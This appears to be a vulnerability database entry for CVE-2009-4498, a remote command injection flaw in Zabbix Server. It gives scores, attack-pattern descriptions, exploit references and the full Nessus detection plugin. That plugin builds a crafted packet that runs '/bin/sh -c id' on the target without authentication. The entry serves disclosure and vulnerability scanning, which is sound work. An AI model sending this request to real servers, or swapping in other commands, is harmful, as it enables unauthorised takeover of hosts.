Vulnerabilities > CVE-2009-4498 - OS Command Injection vulnerability in Zabbix

047910
CVSS 6.8 - MEDIUM
Attack vector
NETWORK
Attack complexity
MEDIUM
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
zabbix
CWE-78
nessus
exploit available
metasploit

Summary

The node_process_command function in Zabbix Server before 1.8 allows remote attackers to execute arbitrary commands via a crafted request.

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Command Line Execution through SQL Injection
    An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host.
  • Command Delimiters
    An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or a blacklist input validation, as opposed to whitelist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or blacklist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.
  • Exploiting Multiple Input Interpretation Layers
    An attacker supplies the target software with input data that contains sequences of special characters designed to bypass input validation logic. This exploit relies on the target making multiples passes over the input data and processing a "layer" of special characters with each pass. In this manner, the attacker can disguise input that would otherwise be rejected as invalid by concealing it with layers of special/escape characters that are stripped off by subsequent processing steps. The goal is to first discover cases where the input validation layer executes before one or more parsing layers. That is, user input may go through the following logic in an application: In such cases, the attacker will need to provide input that will pass through the input validator, but after passing through parser2, will be converted into something that the input validator was supposed to stop.
  • Argument Injection
    An attacker changes the behavior or state of a targeted application through injecting data or command syntax through the targets use of non-validated and non-filtered arguments of exposed services or methods.
  • OS Command Injection
    In this type of an attack, an adversary injects operating system commands into existing application functions. An application that uses untrusted input to build command strings is vulnerable. An adversary can leverage OS command injection in an application to elevate privileges, execute arbitrary commands and compromise the underlying operating system.

Exploit-Db

  • descriptionZabbix Server Multiple remote vulnerabilities. CVE-2009-4498,CVE-2009-4499,CVE-2009-4501. Webapps exploits for multiple platform
    idEDB-ID:10432
    last seen2016-02-01
    modified2009-12-14
    published2009-12-14
    reporterNicob
    sourcehttps://www.exploit-db.com/download/10432/
    titlezabbix server Multiple Vulnerabilities
  • descriptionZabbix Server Arbitrary Command Execution. CVE-2009-4498. Remote exploit for linux platform
    idEDB-ID:20796
    last seen2016-02-02
    modified2012-08-27
    published2012-08-27
    reportermetasploit
    sourcehttps://www.exploit-db.com/download/20796/
    titleZabbix Server Arbitrary Command Execution

Metasploit

descriptionThis module abuses the "Command" trap in Zabbix Server to execute arbitrary commands without authentication. By default the Node ID "0" is used, if it doesn't work, the Node ID is leaked from the error message and exploitation retried. According to the vendor versions prior to 1.6.9 are vulnerable. The vulnerability has been successfully tested on Zabbix Server 1.6.7 on Ubuntu 10.04.
idMSF:EXPLOIT/LINUX/MISC/ZABBIX_SERVER_EXEC
last seen2020-03-23
modified2017-07-24
published2012-08-23
references
reporterRapid7
sourcehttps://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/zabbix_server_exec.rb
titleZabbix Server Arbitrary Command Execution

Nessus

NASL familyMisc.
NASL idZABBIX_REMOTE_COMMAND_EXECUTION.NASL
descriptionThe version of Zabbix server running on the remote host has a command execution vulnerability in the
last seen2020-06-01
modified2020-06-02
plugin id44620
published2010-02-15
reporterThis script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
sourcehttps://www.tenable.com/plugins/nessus/44620
titleZabbix node_process_command() Function Crafted Request Arbitrary Command Execution
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");


if (description)
{
  script_id(44620);
  script_version("1.12");
  script_cvs_date("Date: 2018/08/07 16:46:51");

  script_cve_id("CVE-2009-4498");
  script_bugtraq_id(37989);
  script_xref(name:"Secunia", value:"37740");

  script_name(english:"Zabbix node_process_command() Function Crafted Request Arbitrary Command Execution");
  script_summary(english:"Attempts to execute the command 'id' on the server");

  script_set_attribute(attribute:"synopsis", value:"The remote service allows execution of arbitrary commands.");
  script_set_attribute(
    attribute:"description",
    value:
"The version of Zabbix server running on the remote host has a command
execution vulnerability in the 'process_node_command()' function of
'nodehistory.c'. 

A remote attacker could exploit this by sending a specially crafted
request, resulting in the execution of operating system commands."
  );
  script_set_attribute(attribute:"see_also", value:"https://support.zabbix.com/browse/ZBX-1030");
  script_set_attribute(attribute:"solution", value:"Upgrade to Zabbix 1.6.8 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploithub_sku", value:"EH-12-725");
  script_set_attribute(attribute:"exploit_framework_exploithub", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Zabbix Server Arbitrary Command Execution');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_cwe_id(78);

  script_set_attribute(attribute:"vuln_publication_date", value:"2009/09/15");
  script_set_attribute(attribute:"patch_publication_date", value:"2009/12/13");
  script_set_attribute(attribute:"plugin_publication_date", value:"2010/02/15");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("zabbix_server_detect.nasl");
  script_require_ports("Services/zabbix_server", 10051);

  exit(0);
}


include("global_settings.inc");
include("byte_func.inc");
include("misc_func.inc");
include("data_protection.inc");

port = get_kb_item("Services/zabbix_server");
if (!port) port = 10051;
if (!get_port_state(port)) exit(0, "Port "+port+" is not open.");

soc = open_sock_tcp(port);
if (!soc) exit(1, "Can't open a socket on port "+port+".");

set_byte_order(BYTE_ORDER_LITTLE_ENDIAN);

header = 'ZBXD'+mkbyte(1);
data = 'Command'+mkbyte(0255);
data += '0' + mkbyte(0255);
data += '0000' + mkbyte(0255);
data += '/bin/sh -c id' + mkbyte(0255);
size = mkdword(strlen(data)) + mkdword(0);

req = header+size+data;
send(socket:soc, data:req);

res = recv(socket:soc, length:256);

# should look something like this: uid=1001(zabbix) gid=1001(zabbix) groups=1001(zabbix)
if(strlen(res) && "uid=" >< res)
{
  if (report_verbosity > 0)
  {
    report = '\nThe output of "/bin/sh -c id" is :\n\n'+data_protection::sanitize_uid(output:res)+'\n';
    security_hole(port:port, extra:report);
  }
  else security_hole(port);
  exit(0);
}
else exit(0, 'The Zabbix server on port '+port+' is not affected.');

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/115950/zabbix_server_exec.rb.txt
idPACKETSTORM:115950
last seen2016-12-05
published2012-08-28
reporterNicob
sourcehttps://packetstormsecurity.com/files/115950/Zabbix-Server-Arbitrary-Command-Execution.html
titleZabbix Server Arbitrary Command Execution